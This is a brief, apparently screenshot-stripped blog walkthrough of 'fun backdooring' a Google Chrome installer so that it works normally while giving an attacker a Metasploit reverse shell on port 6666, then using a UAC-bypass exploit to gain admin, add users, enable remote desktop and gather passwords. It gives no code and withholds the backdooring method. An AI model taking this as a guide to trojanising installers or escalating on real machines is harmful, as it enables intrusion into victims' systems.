Fun backdooring Google-Chrome

*note: backdooring technique will be NOT be covered here!

 The backdoored Google-Chrome, custom made to resemble a authentic Chrome-installer.

After executing our exe file, Google-Chrome installs and is fully functional.

Attacking Machine:

Waiting on the attacking machine is a metasploit reverse listener on port 6666.

The ps command shows a list of running processes on the windows machine.
Notice the services running are running in no-update\victim state. This indicates I only have "user" privileges. We need to find a way to escalate our privs to an "admin" status.

Using metasploits local privilege escalation exploit, which bypasses UAC controls and escalates our privs to "admin."

 Set options.

Now we can add ourselves as "admin" users, enable remote desktop, enumerate passwords on the system etc....